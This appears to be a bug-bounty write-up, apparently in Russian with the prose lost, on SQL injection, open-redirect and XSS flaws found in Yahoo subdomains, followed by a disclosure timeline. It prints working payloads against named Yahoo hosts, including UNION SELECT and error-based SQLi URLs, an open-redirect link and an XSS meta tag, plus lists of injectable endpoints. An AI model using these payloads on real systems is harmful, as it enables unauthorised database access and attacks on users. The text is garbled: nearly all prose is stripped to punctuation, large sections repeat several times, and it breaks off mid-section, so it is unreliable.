
UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1

.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .





.

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1

.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .





.

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1

.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .





.

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1





.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .

.

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1





.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

<meta property="og:title" content="og <img src=asdf onerror='alert(\"xss\")'> Yahoo Enters into Amendment to Share Repurchase and Preference Sale Agreement with Alibaba"/>





XSS. . XSS, Chrome, .



.

, Yahoo. . . , .



.

finance.yahoo.com. , UNION SELECT SQLi c . :

21.11 -

25.11 -

27.11 - : " , "

27.11 - - .

2.12 - : " , ."

"WTF?!!!" - . .

10.12 - . , , , : ", . ."

, Yahoo XSS SQLi " ":



, , . , , .



, , , , , -10 Yahoo - Wall of Fame .



- : hackerone.com/4lemon .



PS. . . , HackerOne , . - Yahoo 10 .

.

, XSS.



. SQLi *.sports.yahoo.com.

.

http://sports.yahoo.com/static/bir/nascardrivercompare?year=2013&series=sprint&race=43&c1=99CCFF&c2=00A900&c3=D30897&d1=205&d2=711

. , race . , , . , "<" ">". - BETWEEN . Union select . - username@% - IP. - , , . - , , . , -, , SQLi-, . :

sports.yahoo.com/golf/pga/schedule?season=2013

sports.yahoo.com/golf/pga/stats/bycategory?cat=CUP_POINTS&season=2013

sports.yahoo.com/golf/lpga/players/ShinAe+Ahn/10966/log?season=2012

sports.yahoo.com/golf/lpga/schedule?season=2012

sports.yahoo.com/golf/champions/schedule?season=2012

sports.yahoo.com/golf/web.com/schedule?season=2013

sports.yahoo.com/golf/european/schedule?season=2013

sports.yahoo.com/golf/pga/players/Tiger+Woods/147/log?season=2012

:

sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=23

sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

sports.yahoo.com/wnba/stats/byposition?pos=G&conference=WNBA&year=2013&sort=TEAM_ABBR

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

ca.sports.yahoo.com/mlb/players/7163/splits?year=2013&type=Batting

ca.sports.yahoo.com/mlb/players/7163/batvspit?year=2012&type=Batting

ca.sports.yahoo.com/mlb/players/7163/situational?year=2012&type=Batting

ca.sports.yahoo.com/mlb/stats/byposition?pos=1B&conference=MLB&year=season_2013&qualified=1&sort=0

ca.sports.yahoo.com/mlb/stats/byteam?cat=Overall&cut_type=0&sort=722&conference=MLB&year=postseason_2013

ca.sports.yahoo.com/mlb/standings?type=regular&year=season_2013

sports.yahoo.com/wnba/stats/bycategory?cat=Fielding&conference=WNBA&year=2013&sort=29

:

sports.yahoo.com/wnba/stats/byteam?cat1=Splits&cat2=140&conference=WNBA&year=2013

:

racing.fantasysports.yahoo.com/auto/expertpicks?week=35

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

(stat1/2):

baseball.fantasysports.yahoo.com/b1/176043/1?date=2013-09-29&stat1=SPS&stat2=54_2013

football.fantasysports.yahoo.com/f1/1064329/2/team?week=12&stat1=SPS&stat2=37_2013

baseball.fantasysports.yahoo.com/b1/176043/players?status=A&pos=B&cut_type=33&stat1=S_S_2013&myteam=0&sort=AR&sdir=1

basketball.fantasysports.yahoo.com/nba/57114/3/team?stat1=S&stat2=S_2012

basketball.fantasysports.yahoo.com/nba/57114/players?status=3&pos=P&cut_type=33&stat1=S_AS_2013&myteam=0&sort=10&sdir=1

:

- Union select - - , - .

- , USERNAME@%

- @@hostname , 40+ . MySQL. . , . . .

- , year=postseason_2013 information_schema, . , hex, - .



:

racing.fantasysports.yahoo.com/auto/playerdistribution?week=35

UNION SELECT:

http://racing.fantasysports.yahoo.com/auto/playerdistribution?week=0%20union%20select%201,2,3%20--%20and%201=2

. - , , . , , UNION " - ". :

union select 1, ord(substr(user(),1,1))/100,1





.



:



SQL . .



. Open redirect m.yahoo.com.

m.yahoo.com, ( : dark side of reproduce this bug ), :

Welcome to Yahoo

Thanks for signing in!

It looks like you customized your Home Page before you signed in. What would you like to do?

[radiobutton] Move the existing settings to my Yahoo ID [radiobutton] Ignore the existing settings [radiobutton] Not sure, show me a preview

"Not sure". POST- :

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en

Firebug' GET:

m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=&hid=uqacAfM-&ycb=z5H1KI8rvxS

- . , , POST-, $_POST $_REQUEST . XSS, done , , "" ycb :

http://m.yahoo.com/w/ygo-frontpage/login/mergesubmit.bp?.ts=1385212848&.intl=us&.lang=en&__submit=Continue&choice=preview&done=http://example.com&hid=zzzzzzz&ycb=MALFORMED



, , : " ?!". Yahoo 394 .



. SQLi hk.promotion.yahoo.net.

. , , yahoo.net . , . - . .



, error-based SQLi:

http://hk.promotion.yahoo.net/comments/service.php?q=retrieve_comments&comment_url=http://hk.promotion.yahoo.net/education/secschool/tutorial/%27%20AND%20%28SELECT%206898%20FROM%28SELECT%20COUNT%28*%29,CONCAT%280x3a766f763a,user%28%29,0x3a7661793a,FLOOR%28RAND%280%29*2%29%29x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x%29a%29%20AND%20%27cQlK%27=%27cQlK&page=0&no_of_comment=3&callback=jQuery18309010937072284149_1385387977539&_=1385387978928



, . XSS info.yahoo.com.

( ).

http://info.yahoo.com/_xhr/mtf_popup/?url=http%3A%2F%2Finfo.yahoo.com%2Fpress-center%2Farticle%2Fyahoo-enters-amendment-share-repurchase-200500390.html&site=info®ion=US&lang=en-US&alias_id=yahoo-enters-amendment-share-repurchase-200500390



- , . - .



. http https. , , , , meta- og:title og:description . meta- :

